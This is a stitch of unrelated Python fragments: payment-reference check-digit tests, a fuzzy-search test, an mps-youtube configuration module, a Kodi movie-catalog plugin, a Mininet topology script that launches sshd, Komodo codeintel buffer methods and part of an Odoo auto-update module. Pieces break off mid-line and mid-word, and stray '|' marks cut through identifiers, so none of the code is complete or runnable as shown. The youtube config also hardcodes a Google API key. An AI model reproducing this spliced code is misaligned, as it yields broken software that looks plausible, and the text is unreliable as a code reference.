    assert fin_reference_isvalid(108711)
def test_fin_reference_isvalid_invalid_results():
"""Test handpicked, known-bad inputs"""
assert not fin_reference_isvalid(1071110)
assert not fin_reference_isvalid(1055110)
assert not fin_reference_isvalid(1026110)
| assert not fin_reference_isvalid(1039110)
assert not fin_reference_isvalid(1084110)
def test_int2fin_refere | nce_valid_results():
"""Test handpicked, known-good inputs and corresponding outputs"""
assert int2fin_reference(1) == '13'
assert int2fin_reference(10) == '107'
assert int2fin_reference(10552) == '105523'
assert int2fin_reference(10231) == '102319'
assert int2fin_reference(10832) == '108326'
assert int2fin_reference(10081) == '100816'
assert int2fin_reference(10872) == '108724'
assert int2fin_reference(10871) == '108711'
def test_int2fin_reference_invalid_results():
    """Test some invalid values from issue #6: outputs once produced by
    a buggy implementation must no longer appear."""
    assert int2fin_reference(10711) != '1071110'
    assert int2fin_reference(10551) != '1055110'
    assert int2fin_reference(10261) != '1026110'
    assert int2fin_reference(10391) != '1039110'
    assert int2fin_reference(10841) != '1084110'
def test_int2fin_reference_random_inputs():
    """Property test: every generated reference must validate."""
    for x in range(1000):
        testint = random.randint(1, 2**24)
        reference = int2fin_reference(testint)
        assert fin_reference_isvalid(reference)
def test_str2iso_reference_valid_results():
    """Known-good RF creditor reference (correct check digits)."""
    assert str2iso_reference('C2H5OH') == 'RF97C2H5OH'
def test_str2iso_reference_invalid_results():
    """A reference with wrong check digits must not be produced."""
    assert str2iso_reference('C2H5OH') != 'RF40C2H5OH'
def test_iso_reference_isvalid_valid_results():
    """Known-good RF reference validates."""
    assert iso_reference_isvalid('RF97C2H5OH')
def test_iso_reference_isvalid_invalid_results():
    """RF reference with wrong check digits is rejected."""
    assert not iso_reference_isvalid('RF40C2H5OH')
def test_str2iso_reference_random_integers():
    """Property test: references built from random numeric strings
    must validate."""
    for x in range(1000):
        testint = random.randint(1, 2**24)
        reference = str2iso_reference(str(testint))
        assert iso_reference_isvalid(reference)
def test_str2iso_reference_random_strings():
    """Property test: references built from random allowed characters
    must validate."""
    for x in range(1000):
        teststr = ''
        for y in range(5, 14):
            teststr += random.choice(ISO_REFERENCE_VALID)
        reference = str2iso_reference(teststr)
        assert iso_reference_isvalid(reference)
|
#!/usr/bin/env python3.4
# -*- c | oding: utf | -8 -*-
|
import pytest
from awsshell.fuzzy import fuzzy_search
@pytest.mark.parametrize("sea | rch,corpus,expected", [
('foo', ['foobar', 'fooba | z'], ['foobar', 'foobaz']),
('f', ['foo', 'foobar', 'bar'], ['foo', 'foobar']),
('fbb', ['foo-bar-baz', 'fo-ba-baz', 'bar'], ['foo-bar-baz', 'fo-ba-baz']),
('fff', ['fi-fi-fi', 'fo'], ['fi-fi-fi']),
# The more chars it matches, the higher the score.
('pre', ['prefix', 'pre', 'not'], ['pre', 'prefix']),
('nomatch', ['noma', 'nomatccc'], []),
])
def test_subsequences(search, corpus, expected):
actual = fuzzy_search(search, corpus)
assert actual == expected
|
from akara.dist import se | tup
setup(name="basic",
version="1.0",
akara_extensions=["blah.py"]
)
| |
ss_msg
def check_console_width(val):
""" Show ruler to check console width. """
valid = True
message = "-" * val + "\n"
message += "console_width set to %s, try a lower value if above line ove"\
"rlaps" % val
return dict(valid=valid, message=message)
def check_api_key(key):
    """ Validate an API key by calling an API endpoint with no quota cost """
    url = "https://www.googleapis.com/youtube/v3/i18nLanguages"
    # Minimal part/fields keep the response (and quota impact) tiny.
    query = {"part": "snippet", "fields": "items/id", "key": key}
    try:
        urlopen(url + "?" + urlencode(query)).read()
        message = "The key, '" + key + "' will now be used for API requests."
        # Make pafy use the same api key
        pafy.set_api_key(Config.API_KEY.get)
        return dict(valid=True, message=message)
    except HTTPError:
        # NOTE(review): any HTTP error is reported as bad-key-or-quota;
        # the two cases are not distinguished here.
        message = "Invalid key or quota exceeded, '" + key + "'"
        return dict(valid=False, message=message)
def check_ddir(d):
    """ Check whether d is a valid download directory (tilde-expanded). """
    expanded = os.path.expanduser(d)
    if not os.path.isdir(expanded):
        return dict(valid=False,
                    message="Not a valid directory: " + c.r + d + c.w)
    return dict(valid=True,
                message="Downloads will be saved to " + c.y + d + c.w,
                value=expanded)
def check_win_pos(pos):
    """ Check window position input.

    Accepts e.g. "top left", "Bottom-Right" (case-insensitive, any
    single separator character) and normalises to "top-left" /
    "bottom-right".  An empty value means "default".
    """
    if not pos.strip():
        return dict(valid=True, message="Window position not set (default)")

    pos = pos.lower()
    reg = r"(TOP|BOTTOM).?(LEFT|RIGHT)"
    # Match once instead of twice (the original ran the regex in the
    # condition and again to extract the groups).
    match = re.match(reg, pos, re.I)

    if not match:
        msg = "Try something like top-left or bottom-right (or default)"
        return dict(valid=False, message=msg)

    p = "%s-%s" % match.groups()
    msg = "Window position set to %s" % p
    return dict(valid=True, message=msg, value=p)
def check_win_size(size):
    """ Check window size input ("WIDTHxHEIGHT", e.g. 720x480). """
    if not size.strip():
        return dict(valid=True, message="Window size not set (default)")

    size = size.lower()
    # Bug fix: re.match() only anchors at the start, so trailing garbage
    # such as "720x480xyz" used to be accepted; fullmatch rejects it.
    if not re.fullmatch(r"\d{1,4}x\d{1,4}", size):
        return dict(valid=False, message="Try something like 720x480")

    return dict(valid=True, value=size)
def check_encoder(option):
    """ Check encoder value is acceptable (an index into g.encoders). """
    encs = g.encoders
    if option >= len(encs):
        # c.* are presumably terminal colour codes — consistent with
        # their use in the other check_* helpers.
        message = "%s%s%s is too high, type %sencoders%s to see valid values"
        message = message % (c.y, option, c.w, c.g, c.w)
        return dict(valid=False, message=message)
    else:
        message = "Encoder set to %s%s%s"
        message = message % (c.y, encs[option]['name'], c.w)
        return dict(valid=True, message=message)
def check_player(player):
    """ Check player exefile exists and get mpv version.

    On Windows, if the bare name is not found, retries with ".com"
    (preferred for mpv) and ".exe" appended.
    """
    if util.has_exefile(player):
        print(player)
        util.assign_player(player)
        if "mpv" in player:
            version = "%s.%s.%s" % g.mpv_version
            fmt = c.g, c.w, c.g, c.w, version
            msg = "%splayer%s set to %smpv%s (version %s)" % fmt
            return dict(valid=True, message=msg, value=player)
        else:
            msg = "%splayer%s set to %s%s%s" % (c.g, c.w, c.g, player, c.w)
            return dict(valid=True, message=msg, value=player)
    else:
        # Not found: on Windows retry with an executable extension.
        if mswin and not (player.endswith(".exe") or player.endswith(".com")):
            # Using mpv.exe has issues; use mpv.com
            if "mpv" in player:
                retval = check_player(player + ".com")
                if retval["valid"]:
                    return retval
            return check_player(player + ".exe")
        else:
            msg = "Player application %s%s%s not found" % (c.r, player, c.w)
            return dict(valid=False, message=msg)
def check_lastfm_password(password):
    """ Hash a last.fm password for storage; fails when pylast is absent. """
    if not has_pylast:
        return dict(valid=False, message="pylast not installed")
    return dict(valid=True, value=pylast.md5(password))
class _Config:
    """ Holds various configuration values. """

    # Master list of configuration items: name, default value, and
    # optional validation (allowed_values / minval / maxval / check_fn).
    _configitems = [
        ConfigItem("order", "relevance",
                   allowed_values="relevance date views rating title".split()),
        ConfigItem("user_order", "", allowed_values =
                   [""] + "relevance date views rating".split()),
        ConfigItem("max_results", 19, maxval=50, minval=1),
        ConfigItem("console_width", 80, minval=70,
                   maxval=880, check_fn=check_console_width),
        ConfigItem("max_res", 2160, minval=192, maxval=2160),
        # on Windows the default player name carries the .exe suffix
        ConfigItem("player", "mplayer" + ".exe" * mswin,
                   check_fn=check_player),
        ConfigItem("playerargs", ""),
        ConfigItem("encoder", 0, minval=0, check_fn=check_encoder),
        ConfigItem("notifier", ""),
        ConfigItem("checkupdate", True),
        ConfigItem("show_player_keys", True, require_known_player=True),
        ConfigItem("fullscreen", False, require_known_player=True),
        ConfigItem("show_status", True),
        ConfigItem("columns", ""),
        ConfigItem("ddir", paths.get_default_ddir(), check_fn=check_ddir),
        ConfigItem("overwrite", True),
        ConfigItem("show_video", False),
        ConfigItem("search_music", True),
        ConfigItem("window_pos", "", check_fn=check_win_pos,
                   require_known_player=True),
        ConfigItem("window_size", "",
                   check_fn=check_win_size, require_known_player=True),
        ConfigItem("download_command", ''),
        ConfigItem("lastfm_username", ''),
        ConfigItem("lastfm_password", '', check_fn=check_lastfm_password),
        ConfigItem("lastfm_api_key", ''),
        ConfigItem("lastfm_api_secret", ''),
        ConfigItem("audio_format", "auto",
                   allowed_values="auto webm m4a".split()),
        ConfigItem("video_format", "auto",
                   allowed_values="auto webm mp4 3gp".split()),
        ConfigItem("api_key", "AIzaSyCIM4EzNqi1in22f4Z3Ru3iYvLaY8tc3bo",
                   check_fn=check_api_key),
        ConfigItem("autoplay", False),
        ConfigItem("set_title", True),
        # MPRIS integration is enabled everywhere except Windows
        ConfigItem("mpris", not mswin),
    ]

    def __getitem__(self, key):
        """Look up a ConfigItem by its upper-cased name, e.g. "ORDER"."""
        # TODO: Possibly more efficient algorithm, w/ caching
        for i in self._configitems:
            if i.name.upper() == key:
                return i
        raise KeyError

    def __getattr__(self, name):
        """Allow attribute-style access (Config.ORDER) to config items."""
        try:
            return self[name]
        except KeyError:
            raise AttributeError

    def __iter__(self):
        """Iterate over the upper-cased names of all config items."""
        return (i.name.upper() for i in self._configitems)

    def save(self):
        """ Save current config to file. """
        config = {setting: self[setting].value for setting in self}
        with open(g.CFFILE, "wb") as cf:
            # protocol 2 keeps the pickle readable by Python 2 as well
            pickle.dump(config, cf, protocol=2)
        util.dbg(c.p + "Saved config: " + g.CFFILE + c.w)

    def load(self):
        """ Override config if config file exists. """
        if os.path.exists(g.CFFILE):
            with open(g.CFFILE, "rb") as cf:
                saved_config = pickle.load(cf)
            for k, v in saved_config.items():
                try:
                    self[k].value = v
                except KeyError:  # Ignore unrecognised data in config
                    util.dbg("Unrecognised config item: %s", k)
            # Update config files from versions <= 0.01.41
            # (old versions stored PLAYERARGS as a list; migrate to a
            # space-joined string and strip now-redundant flags)
            if isinstance(self.PLAYERARGS.get, list):
                self.WINDOW_POS.value = "top-right"
                redundant = ("-really-quiet --really-quiet -prefer-ipv4 -nolirc "
                             "-fs --fs".split())
                for r in redundant:
                    util.dbg("removing redundant arg %s", r)
                    util.list_update(r, self.PLAYERARGS.value, remove=True)
                self.PLAYERARGS.value = " ".join(self.PLAYERARGS.get)
                self.save()
Config = _Config()
del _Config # _Config is a singleton and should not have more in |
'Country': country,
'PlotOutline': item['description'],
'Plot': item['long_description'],
'Year': item['year'],
'Rating': imdb['rating'],
'Votes': imdb['votes']
}
country = ' (' + country + ')' if (country) else ''
label = common.replaceHTMLCodes('[B]' + item['name'] + '[/B]' + country + genres + rating)
icon = BASE_URL + item['cover']
video_id = item['movie_id']
items.append({
'label': label,
'icon': icon,
'properties': properties,
'id': video_id
})
else:
megogo = True
except:
pass
# if megogo: plugin.notify('Megogo пропущен', BASE_NAME, 1000, get_local_icon('noty_' + BASE_LABEL))
except:
default_oc_noty()
return {'items': items, 'sys_items': sys_items}
# method
def get_genre_movie_list(genre, page='0'):
    """ Fetch one page of the site's movie catalog for `genre`.

    Returns {'items': [...], 'sys_items': [...]} where each item is a
    {'label', 'icon', 'properties', 'id'} dict and sys_items carries
    pagination entries.  On any error a notification is shown and the
    lists come back (partially) empty.
    """
    sys_items = []
    items = []
    size = 40  # page size sent to the API
    order_id = 0
    try:
        offset = int(page) * size
        result = common.fetchPage({'link': BASE_API_URL,
                                   'post_data': {'action[0]': 'Video.getCatalog', 'offset[0]': str(offset),
                                                 'size[0]': str(size), 'order[0]': order_id, 'genre[0]': genre}})
        kg_stats(BASE_URL, GA_CODE, NK_CODE)
        if result['status'] == 200:
            data = json.loads(result['content'])
            data = data['json'][0]['response']
            # ======== pagination ========#
            sys_items = KG_get_pagination((offset / size + 1), total=data['total'], size=size, offset=1)
            # ======== END pagination ========#
            megogo = False
            for item in data['movies']:
                try:
                    try:
                        # show at most three genres in the label
                        genres = ' [' + ', '.join(item['genres'][:3]) + ']'
                    except:
                        genres = ''
                    # Megogo-hosted entries are skipped entirely
                    if 'Megogo' not in item['genres']:
                        imdb = {'rating': '0', 'votes': '0'}
                        kinopoisk = {'rating': '0', 'votes': '0'}
                        if ('rating_imdb_value' in item):
                            imdb = {'rating': item['rating_imdb_value'], 'votes': item['rating_imdb_count']}
                        if ('rating_kinopoisk_value' in item):
                            kinopoisk = {'rating': item['rating_kinopoisk_value'],
                                         'votes': item['rating_kinopoisk_count']}
                        rating = ''
                        # ratings are shown only when both sources have one
                        if (imdb['rating'] != '0' and kinopoisk['rating'] != '0'):
                            rating = ' ' + imdb['rating'] + ' (' + imdb['votes'] + ') / ' + kinopoisk[
                                'rating'] + ' (' + kinopoisk['votes'] + ')'
                        country = ''
                        if ('countries' in item):
                            country = item['countries'][0]
                        properties = {
                            'Country': country,
                            'PlotOutline': item['description'],
                            'Plot': item['long_description'],
                            'Year': item['year'],
                            'Rating': imdb['rating'],
                            'Votes': imdb['votes']
                        }
                        country = ' (' + country + ')' if (country) else ''
                        label = common.replaceHTMLCodes('[B]' + item['name'] + '[/B]' + country + genres + rating)
                        icon = BASE_URL + item['cover']
                        video_id = item['movie_id']
                        items.append({
                            'label': label,
                            'icon': icon,
                            'properties': properties,
                            'id': video_id
                        })
                    else:
                        megogo = True
                # per-item failures are silently skipped by design
                except:
                    pass
            # `megogo` is currently only consumed by the disabled notify below
            # if megogo: plugin.notify('Megogo пропущен', BASE_NAME, 1000, get_local_icon('noty_' + BASE_LABEL))
    except:
        default_oc_noty()
    return {'items': items, 'sys_items': sys_items}
# method
def get_search_results(search_value=''):
    """ Query the site's suggestion endpoint for `search_value`.

    Returns a list of {'label', 'icon', 'id'} dicts, one per matching
    movie; failures yield a notification and/or an empty list.
    """
    items = []
    try:
        url = BASE_URL + 'suggestion.php?q=' + urllib2.quote(search_value)
        result = common.fetchPage({'link': url})
        kg_stats(BASE_URL, GA_CODE, NK_CODE)
        if result['status'] == 200:
            response = json.loads(result['content'])['json'][0]['response']
            for movie in response['movies']:
                try:
                    title = movie['name'] + ' | ' + movie['international_name'] + ' (' + movie['year'] + ')'
                    items.append({
                        'label': common.replaceHTMLCodes(title),
                        'icon': BASE_URL + movie['cover'],
                        'id': movie['movie_id']
                    })
                except:
                    pass
    except:
        default_oc_noty()
    return items
# method
def get_movie(id):
items = []
try:
result = common.fetchPage(
{'link': BASE_API_URL, 'post_data': {'action[0]': 'Video.getMovie', 'movie_id[0]': id}})
kg_stats(BASE_URL, GA_CODE, NK_CODE)
if result['status'] == 200:
data = json.loads(result['content'])
item = data['json'][0]['response']['movie']
icon = BASE_URL + item['covers'][0]['original']
try:
trailer = item['trailer']
try:
name = trailer['name']
except:
name = 'Трейлер'
items.append({
'title': name,
'label': name,
'icon': get_local_icon('kinopoisk'),
'properties': {'fanart_image': trailer['preview']},
'url': trailer['video']
})
except:
pass
for video in item['files']:
try:
label = item['name'] + ': ' + video['name']
url = get_playable_url(video['path']) + UserAgent
try:
fan = video['frames'][0]
except:
fan = ''
properties = {
'duration': video['metainfo']['playtime'],
'fanart_image': fan,
}
items.append({
'title': label,
'label': set_color('ПРОСМОТР: ', 'bold').decode('utf-8') + label,
'icon': icon,
'properties': properties,
'url': url
})
except:
# xbmc.log('Exception : ' + str(traceback.format_exc()))
continue
try:
for other in item['other_movies']:
try:
try:
fan = BASE_URL + other['cover']
except:
fan = ''
properties = {
'fanart_image': fan,
}
items.append({
'title': other['name'],
'label': set_color('ЕЩЕ: ', 'bold').decode('utf-8') + other['name'],
'icon': fan,
'properties': properties,
'url': plugin.url_for('oc_movie', id=othe |
#!/usr/bin/python
NWID=1
NR_NODES=20
#Controllers=[{"ip":'127.0.0.1', "port":6633}, {"ip":'10.0.1.28', "port":6633}]
Controllers=[{"ip":'10.0.1.28', "port":6633}]
"""
Start up a Simple topology
"""
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.log import setLogLevel, info, error, warn, debug
from mininet.cli import CLI
from mininet.topo import Topo
from mininet.util import quietRun
from mininet.moduledeps import pathCheck
from mininet.link import Link, TCLink
from sys import exit
import os.path
from subprocess import Popen, STDOUT, PIPE
import sys
#import argparse
class MyController( Controller ):
    """Controller shim for an externally-managed (remote) controller:
    start/stop are no-ops, and reachability is only warned about."""

    def __init__( self, name, ip='127.0.0.1', port=6633, **kwargs):
        """Init.
        name: name to give controller
        ip: the IP address where the remote controller is
        listening
        port: the port where the remote controller is listening"""
        Controller.__init__( self, name, ip=ip, port=port, **kwargs )

    def start( self ):
        "Overridden to do nothing."
        return

    def stop( self ):
        "Overridden to do nothing."
        return

    def checkListening( self ):
        "Warn if remote controller is not accessible"
        # probe with telnet (escape char A); output contains 'Unable'
        # when the connection cannot be established
        listening = self.cmd( "echo A | telnet -e A %s %d" %
                              ( self.ip, self.port ) )
        if 'Unable' in listening:
            warn( "Unable to contact the remote controller"
                  " at %s:%d\n" % ( self.ip, self.port ) )
class SDNTopo( Topo ):
    "SDN Topology"

    def __init__( self, *args, **kwargs ):
        """Star topology of NR_NODES switches with switch 0 as hub.

        Each switch gets one host; each host is additionally linked to
        a 'root' host running in the root namespace (inNamespace=False).
        """
        Topo.__init__( self, *args, **kwargs )
        switch = []
        host = []
        root = []
        # dpid low bytes encode network id and node index in hex
        for i in range (NR_NODES):
            name_suffix = '%02d' % NWID + "." + '%02d' % i
            dpid_suffix = '%02x' % NWID + '%02x' % i
            dpid = '0000' + '0000' + '0000' + dpid_suffix
            sw = self.addSwitch('sw'+name_suffix, dpid=dpid)
            switch.append(sw)
        for i in range (NR_NODES):
            host.append(self.addHost( 'host%d' % i ))
        for i in range (NR_NODES):
            root.append(self.addHost( 'root%d' % i, inNamespace=False ))
        for i in range (NR_NODES):
            self.addLink(host[i], switch[i])
        # star: every other switch hangs off switch 0
        for i in range (1, NR_NODES):
            self.addLink(switch[0], switch[i])
        for i in range (NR_NODES):
            self.addLink(root[i], host[i])
def startsshd( host ):
    "Start sshd on host"
    info( '*** Starting sshd\n' )
    name, intf, ip = host.name, host.defaultIntf(), host.IP()
    # the per-host banner file also serves as the marker that
    # stopsshd's `pkill -f Banner` matches
    banner = '/tmp/%s.banner' % name
    host.cmd( 'echo "Welcome to %s at %s" > %s' % ( name, ip, banner ) )
    host.cmd( '/usr/sbin/sshd -o "Banner %s"' % banner, '-o "UseDNS no"' )
    info( '***', host.name, 'is running sshd on', intf, 'at', ip, '\n' )
def startsshds ( hosts ):
    """Start an sshd instance on every host in `hosts`."""
    for host in hosts:
        startsshd( host )
def stopsshd( ):
    "Stop *all* sshd processes with a custom banner"
    # matches the '-o "Banner ..."' option passed by startsshd
    info( '*** Shutting down stale sshd/Banner processes ',
          quietRun( "pkill -9 -f Banner" ), '\n' )
def sdnnet(opt):
    """Build and start the topology against the remote controller(s),
    address the hosts, start sshd on each, and (when opt == "cli")
    drop into the Mininet CLI before tearing everything down."""
    topo = SDNTopo()
    info( '*** Creating network\n' )
    #net = Mininet( topo=topo, controller=MyController, link=TCLink)
    net = Mininet( topo=topo, link=TCLink, build=False)
    # one RemoteController per entry in the module-level Controllers list
    controllers=[]
    for c in Controllers:
        rc = RemoteController('c%d' % Controllers.index(c), ip=c['ip'],port=c['port'])
        print "controller ip %s port %s" % (c['ip'], c['port'])
        controllers.append(rc)
    net.controllers=controllers
    net.build()
    host = []
    for i in range (NR_NODES):
        host.append(net.get( 'host%d' % i ))
    net.start()
    # attach the interface named 'tapa0' to the hub switch sw01.00
    # (assumes the tap device already exists -- TODO confirm)
    sw=net.get('sw01.00')
    print "center sw", sw
    sw.attach('tapa0')
    for i in range (NR_NODES):
        host[i].defaultIntf().setIP('192.168.%d.%d/16' % (NWID,i))
    root = []
    for i in range (NR_NODES):
        root.append(net.get( 'root%d' % i ))
    # per-node 1.1.i.0/24 point-to-point addressing between each host
    # and its root-namespace peer (used below for sshd access)
    for i in range (NR_NODES):
        host[i].intf('host%d-eth1' % i).setIP('1.1.%d.1/24' % i)
        root[i].intf('root%d-eth0' % i).setIP('1.1.%d.2/24' % i)
    stopsshd ()
    startsshds ( host )
    if opt=="cli":
        CLI(net)
        stopsshd()
        net.stop()
if __name__ == '__main__':
    setLogLevel( 'info' )
    # no args: run with interactive CLI; "-n": run without the CLI
    if len(sys.argv) == 1:
        sdnnet("cli")
    elif len(sys.argv) == 2 and sys.argv[1] == "-n":
        sdnnet("nocli")
    else:
        print "%s [-n]" % sys.argv[0]
|
s None:
style = self.accessor.style_at_pos(pos)
style_names = self.style_names_from_style_num(style)
raise CodeIntelError("got unexpected style in `%s': %s %s"
% (basename(self.path), style, style_names))
try:
langintel = self.mgr.langintel_from_lang(lang)
except KeyError:
return None
return langintel.trg_from_pos(self, pos, implicit=implicit, trigger_type=trigger_type)
def preceding_trg_from_pos(self, pos, curr_pos, trigger_type="both"):
    """Delegate to the lang-intel for the language at curr_pos-1.

    Returns None at buffer start or when no lang-intel is registered
    for that language.
    """
    if curr_pos == 0:
        return None
    sub_lang = self.lang_from_pos(curr_pos - 1)
    try:
        intel = self.mgr.langintel_from_lang(sub_lang)
    except KeyError:
        return None
    return intel.preceding_trg_from_pos(
        self, pos, curr_pos, trigger_type=trigger_type)
def curr_calltip_arg_range(self, trg_pos, calltip, curr_pos):
    """Return the (start, end) range of the current calltip argument.

    Returns None at buffer start; (-1, -1) means "cancel the calltip"
    (unknown language, or a lang-intel without calltip support).
    """
    if curr_pos == 0:
        return None
    sub_lang = self.lang_from_pos(curr_pos - 1)
    try:
        intel = self.mgr.langintel_from_lang(sub_lang)
    except KeyError:
        return (-1, -1)
    try:
        return intel.curr_calltip_arg_range(self, trg_pos, calltip, curr_pos)
    except AttributeError:
        # We accidentally moved into a non-programming language during a
        # calltip (e.g. bug 69529); cancel the calltip in that case.
        return (-1, -1)
def async_eval_at_trg(self, trg, ctlr):
    """Ask the lang-intel for `trg.lang` to evaluate the trigger.

    Returns None when no lang-intel is registered for that language.
    """
    try:
        intel = self.mgr.langintel_from_lang(trg.lang)
    except KeyError:
        return None
    return intel.async_eval_at_trg(self, trg, ctlr)
# Override Citadel.defn_trg_from_pos()
def defn_trg_from_pos(self, pos, lang=None):
    """Get a definition trigger at `pos`.

    The `lang` argument is ignored: the language is always re-derived
    from `pos`, because the citadel buffer would otherwise use the
    buffer's top-level language rather than the sub-language here.
    """
    # Work out the language from the position, as the citadel buffer will
    # use the buffer language, we want a language specific to this pos.
    return CitadelBuffer.defn_trg_from_pos(self, pos,
                                           lang=self.lang_from_pos(pos))
def libs(self):
    """Always raises: a single `.libs' is meaningless for multi-lang
    buffers. Use `mgr.langintel_from_lang(lang).libs_from_buf(buf)'
    instead.
    """
    raise RuntimeError("`.libs' invalid for multi-lang buffers: use "
                       "`mgr.langintel_from_lang(lang).libs_from_buf(buf)' "
                       "directly")
def style_names_from_style_num(self, style_num):
    """Map a Scintilla style number to a list of names: the constant
    name from ScintillaConstants plus, when known, the style-group
    name from styles.StateMap (e.g. "strings").

    Raises CodeIntelError when `sce_prefixes` is not set on the class;
    raises KeyError for an unknown style number.
    """
    # XXX Would like to have python-foo instead of p_foo or SCE_P_FOO, but
    # that requires a more comprehensive solution for all langs and
    # multi-langs.
    style_names = []
    # Get the constant name from ScintillaConstants.
    if "UDL" not in self._style_name_from_style_num_from_lang:
        # Build the num -> constant-name table once and cache it.
        name_from_num \
            = self._style_name_from_style_num_from_lang["UDL"] = {}
        if self.sce_prefixes is None:
            raise CodeIntelError("'sce_prefixes' not set on class %s: cannot "
                                 "determine style constant names"
                                 % self.__class__.__name__)
        for attr in dir(ScintillaConstants):
            for sce_prefix in self.sce_prefixes:
                if attr.startswith(sce_prefix):
                    name_from_num[getattr(ScintillaConstants, attr)] = attr
    else:
        name_from_num \
            = self._style_name_from_style_num_from_lang["UDL"]
    const_name = name_from_num[style_num]
    style_names.append(const_name)
    # Get a style group from styles.py.
    if "UDL" in styles.StateMap:
        for style_group, const_names in list(styles.StateMap["UDL"].items()):
            if const_name in const_names:
                style_names.append(style_group)
                break
    else:
        log.warn("lang '%s' not in styles.StateMap: won't have "
                 "common style groups in HTML output" % "UDL")
    return style_names
# lazy cache for string_styles() (class-private via name mangling)
__string_styles = None

def string_styles(self):
    """Return (and cache) the Scintilla style ids of the UDL string
    style classes ("strings" and "stringeol")."""
    if self.__string_styles is None:
        state_map = styles.StateMap["UDL"]
        self.__string_styles = [
            getattr(ScintillaConstants, style_name)
            for style_class in ("strings", "stringeol")
            for style_name in state_map.get(style_class, [])
        ]
    return self.__string_styles
# lazy cache for comment_styles() (class-private via name mangling)
__comment_styles = None

def comment_styles(self):
    """Return (and cache) the Scintilla style ids of the UDL comment
    style classes ("comments", "here documents", "data sections")."""
    if self.__comment_styles is None:
        state_map = styles.StateMap["UDL"]
        self.__comment_styles = [
            getattr(ScintillaConstants, style_name)
            for style_class in ("comments", "here documents",
                                "data sections")
            for style_name in state_map.get(style_class, [])
        ]
    return self.__comment_styles
# lazy cache for number_styles() (class-private via name mangling)
__number_styles = None

def number_styles(self):
    """Return (and cache) the Scintilla style ids of the UDL "numbers"
    style class."""
    if self.__number_styles is None:
        udl_map = styles.StateMap["UDL"]
        ids = []
        for style_class in ("numbers",):
            for const_name in udl_map.get(style_class, []):
                ids.append(getattr(ScintillaConstants, const_name))
        self.__number_styles = ids
    return self.__number_styles
class XMLParsingBufferMixin(object):
"""A mixin for UDLBuffer-based buffers of XML-y/HTML-y languages to
support the following:
- An "xml_tree" attribute that is a XML parse tree of the document
(lazily done from koXMLTreeService)
- An "xml_parse()" method to force a re-parse of the document.
TODO: locking?
"""
# lazily-built XML tree (populated by xml_parse) and cached dataset info
_xml_tree_cache = None
_xml_default_dataset_info = None

@property
def xml_tree(self):
    """XML parse tree of the document, parsed on first access."""
    if self._xml_tree_cache is None:
        self.xml_parse()
    return self._xml_tree_cache
def xml_parse(self):
    """Force a re-parse of the document via koXMLTreeService and
    refresh `_xml_tree_cache`."""
    from koXMLTreeService import getService
    path = self.path
    if isUnsavedPath(self.path):
        # The "<Unsaved>/..." special path can *crash* Python if trying to
        # open it. Besides, the "<Unsaved>" business is an internal
        # codeintel detail.
        path = None
    self._xml_tree_cache = getService().getTreeForURI(
        path, self.accessor.text)
def xml_default_dataset_info(self, node=None):
    """Return the buffer's default dataset info as a 3-tuple
    (default public id, None, default namespace), computed once from
    koXMLDatasetInfo and cached.  `node` is currently unused.
    """
    if self._xml_default_dataset_info is None:
        import koXMLDatasetInfo
        datasetSvc = koXMLDatasetInfo.getService()
        self._xml_default_dataset_info = (
            datasetSvc.getDefaultPublicId(self.m_lang, self.env),
            None,
            datasetSvc.getDefaultNamespace(self.m_lang, self.env))
    return self._xml_default_dataset_info
def xml_tree_handler(self, node=None):
    """Return the koXMLDatasetInfo tree handler for the cached tree."""
    import koXMLDatasetInfo
    return koXMLDatasetInfo.get_tree_handler(self._xml_tree_cache, node, self.xml_default_dataset_info(node))
def xml_node_at_pos(self, po | s):
import koXMLTreeService
self.xml_parse()
tree = self._xml_tree_cache
if not tree:
return None
line, col = self.accessor.line_and_col_at_pos(pos)
node = tree.locateNode(line, col)
# XXX this needs to be worked out better
last_start = self.accessor.text.rfind('<', 0, pos)
last_end = self.accessor.text.find('>', last_start, pos)
if node is None and last_start >= 0:
node = | koXMLTreeService.elementFromText(
tree, self.accessor.text[last_start:last_end], node)
if node is None or node.start is None:
return node
# elementtree line numbers are 1 based, convert to zero based
node_pos = self.accessor.pos_from_line_and_col(
node.start[0]-1, node.start[1])
if last_end == -1 and last_start != node_pos:
# print "try parse ls %d le %d np %d pos %d %r" % (last_start, last_end, node_pos, pos, accessor.text[last_start:pos])
# we have a dirty tree, need to create a cu |
# -*- coding: utf-8 -*-
# Copyright 2017 LasLabs Inc.
# Copyright 2018 ACSONE SA/NV.
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import json
import logging
import os
from openerp import api, exceptions, models, tools
from openerp.modules.module import get_module_path
from ..addon_hash import addon_hash
PARAM_INSTALLED_CHECKSUMS = \
'module_auto_update.installed_checksums'
PARAM_EXCLUDE_PATTERNS = \
'module_auto_update.exclude_patterns'
DEFAULT_EXCLUDE_PATTERNS = \
'*.pyc,*.pyo,i18n/*.pot,i18n_extra/*.pot,static/*'
_logger = logging.getLogger(__name__)
class FailedUpgradeError(exceptions.Warning):
    """Raised when the upgrade process cannot proceed safely."""
    pass
class IncompleteUpgradeError(exceptions.Warning):
    """Raised when modules remain partially installed after an upgrade."""
    pass
def ensure_module_state(env, modules, state):
    """Raise FailedUpgradeError unless every record in `modules` is in
    `state`.

    Queries ir_module_module with raw SQL, bypassing any Odoo cache.
    No-op for an empty recordset.
    """
    # read module states, bypassing any Odoo cache
    if not modules:
        return
    env.cr.execute(
        "SELECT name FROM ir_module_module "
        "WHERE id IN %s AND state != %s",
        (tuple(modules.ids), state),
    )
    names = [r[0] for r in env.cr.fetchall()]
    if names:
        raise FailedUpgradeError(
            "The following modules should be in state '%s' "
            "at this stage: %s. Bailing out for safety." %
            (state, ','.join(names), ),
        )
class Module(models.Model):
    _inherit = 'ir.module.module'

    @api.multi
    def _get_checksum_dir(self):
        """Compute the hash of this (single) module's directory.

        Exclude patterns come from the ir.config_parameter
        `module_auto_update.exclude_patterns`; installed language codes
        are passed to addon_hash (presumably so their translation files
        are kept -- see addon_hash).  Returns False when the module
        directory does not exist on disk.
        """
        self.ensure_one()
        exclude_patterns = self.env["ir.config_parameter"].get_param(
            PARAM_EXCLUDE_PATTERNS,
            DEFAULT_EXCLUDE_PATTERNS,
        )
        exclude_patterns = [p.strip() for p in exclude_patterns.split(',')]
        keep_langs = self.env['res.lang'].search([]).mapped('code')
        module_path = get_module_path(self.name)
        if module_path and os.path.isdir(module_path):
            checksum_dir = addon_hash(
                module_path,
                exclude_patterns,
                keep_langs,
            )
        else:
            checksum_dir = False
        return checksum_dir

    @api.model
    def _get_saved_checksums(self):
